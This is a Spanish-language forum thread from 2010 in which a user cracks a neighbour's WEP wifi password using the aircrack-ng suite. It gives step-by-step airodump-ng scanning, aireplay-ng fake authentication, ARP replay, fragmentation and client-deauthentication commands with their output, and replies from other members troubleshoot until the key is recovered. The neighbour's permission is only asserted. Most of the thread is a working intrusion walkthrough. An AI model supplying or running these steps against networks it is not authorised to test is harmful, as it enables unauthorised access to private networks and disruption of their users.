[Seguimientos/Crónicas]Cracking wifi - Ataque básico

Iniciado por Debci, 24 Junio 2010, 17:40 PM

0 Miembros y 1 Visitante están viendo este tema.

Debci

ATAQUE WIFI BÁSICO


Hola a todos, hoy me he propuesto crackear la contraseña del wifi, de mi vecino, que por supuesto tengo permiso, me he informado, he leido, he estudiado y he llegado a la conclusion del siguiente ataque:

Primero de todo analizo el perimetro de redes wifi:

airodump-ng mon0

CH 11 ][ Elapsed: 1 min ][ 2010-06-24 17:22

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:22:___________ -49       33       29    0   1  54e. WEP  WEP    OPN  WLAN_____
00:15:___________-82       46        0    0  11  54   WEP  WEP         Jazztel ______

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:22:___________  00:08:___________    0    1e- 1e   606      156  WLAN______


Bieeen tengo la red que yo queria crackear, en mi caso Jazztel _____, por tanto me centro en su canal de comunicacion:

airodump-ng -w wep -c 11 --bssid 00:15:___________ mon0

Y empiezo a ver sus datos concretos:

CH 11 ][ Elapsed: 5 mins ][ 2010-06-24 17:29 ][ fixed channel mon0: 1

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:15:___________  -80   4     1830        0    0  11  54   WEP  WEP    OPN  Jazztel ___

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:15:___________  00:08:___________    0    1 - 1      0        9


Ahora empieza el ataque para comenzar a capturar paquetes, para lo cual, primero tengo que inyectarle y hacer una autentificación falsa:

aireplay-ng -1 0 -a 00:15:___________ mon0


Y la asociacion de AP transcurre satisfactoriamente:

No source MAC (-h) specified. Using the device MAC (00:08:___________)
17:28:02  Waiting for beacon frame (BSSID: 00:15:___________) on channel 11

17:28:02  Sending Authentication Request (Open System) [ACK]
17:28:02  Authentication successful
17:28:02  Sending Association Request [ACK]
17:28:02  Association successful :-) (AID: 1)


Ahora empieza la captura de trafico y arp:

aireplay-ng -3 -b 00:15:___________ mon0


No source MAC (-h) specified. Using the device MAC (00:08:___________)
17:25:46  Waiting for beacon frame (BSSID: 00:15:___________) on channel 11
Saving ARP requests in replay_arp-0624-172546.cap
You should also start airodump-ng to capture replies.
2007 packets (got 0 ARP requests and 20 ACKs), sent 0 packets...(0 pps)


Y por mucho que espero no suben los data, estudiando la situación he llegado a la conclusion de que esto ocurre porque no hay ningun cliente asociado que genere trafico de red, y creo que eso se hace en el punto dos de mi ataque, lo que ocurre es que me autentifico falso y al rato me kickea de la falsa autentificación.

Esto es una guia de ataque básico y al mismo tiempo mi duda.

Alguien sabe como puedo solventar este problema sin tener que esperar a que mi vecino empieze a navegar/descargar, en general usar su red?

Saludos y gracias por vuestra atención.

jcrack

 hola  ;D
despues de ataque 1 autenticacion falsa prueba  ataque 5 de fragmentacion asi:
aireplay-ng -1 0 -a(bssid) -h 00:11:22:33:44:55 -e(essid) wlan0
debe salir la carita feliz y aparece OPEN debajo de auth
aireplay-ng -5 -b(mac del AP) -h 00:11:22:33:44:55 wlan0
................
................
si no funciona cambia el ataque 5 por el 0  :
aireplay-ng -0 5 -a (bssid) wlan0
aircrack-ng -n 64 -b (bssid) archivo-01.cap

................
me avisas como te fue
gracias

Debci

Cita de: jcrack en 24 Junio 2010, 22:47 PM
hola  ;D
despues de ataque 1 autenticacion falsa prueba  ataque 5 de fragmentacion asi:
aireplay-ng -1 0 -a(bssid) -h 00:11:22:33:44:55 -e(essid) wlan0
debe salir la carita feliz y aparece OPEN debajo de auth
aireplay-ng -5 -b(mac del AP) -h 00:11:22:33:44:55 wlan0
................
................
si no funciona cambia el ataque 5 por el 0  :
aireplay-ng -0 5 -a (bssid) wlan0
aircrack-ng -n 64 -b (bssid) archivo-01.cap

................
me avisas como te fue
gracias
Lo de open ya me salia, pero no ocurria nada mas.

Saludos

dani__

#3
para generar tráfico con nuestra propia tarjeta deberemos echar mano del tuto que Heavyloto ya publicó en su día para tal fin, y nosotros vamos a usar ahora.

Una vez empezado todo el proceso y viendo que no suben las datas, debemos fijarnos si hay clientes conectados. En caso afirmativo debemos asociarnos con un cliente y para ello abriremos Shell y escribiremos en la misma:


Código:
aireplay-ng -3 –b (Mac víctima) –h (Mac cliente) (las siglas de nuestra interface)

Esto es un A3. Reinyección de petición ARP.

Una vez presionemos enter, veremos como en algunos casos, las datas comienzan a moverse, en ocasiones de una forma escandalosa, pero es lo que queremos no?. Falta aclarar que es posible que tardemos en capturar peticiones ARP, y este factor es mas que  IMPORTANTE, ya que necesitamos de ellas, y si no hay tráfico el ataque no resultará efectivo.
En el caso de que no haya ningún cliente, o aunque lo haya, no exista tráfico entre el AP y el cliente, deberemos generarlo nosotros mismos, utilizando para ello nuestra propia tarjeta. Para esto abrimos Shell, y escribiremos lo siguiente:


Código:
aireplay-ng -1 30 –o 1 –e (nombre del Ap) –a (Mac victima) –h (nuestra Mac) (nuestra interface)

Ahora hemos lanzado un A1. Ataque 1. Autentificación falsa

Esto hace que nosotros mismos nos asociemos como un cliente, y solo nos queda repetir el primer ataque, pues ahora ya hay cliente, nosotros mismos.

fuente:http://foro.elhacker.net/wireless_en_linux/manual_wifislax_wifiway_avanzado_wep_y_wpa_rockeropasiempre_heavyloto_y_zydas-t261907.0.html

Suerte.

Debci

Conseguido, en poco menos de 5 minutos madre mia...
solo que a veces consigo que suban a velocidad bestial los ivs y otrs veces tengo que hacer la falsa autentificacion y posteriormente un aireplay-ng -3 para conseguir trafico de red.

Saludos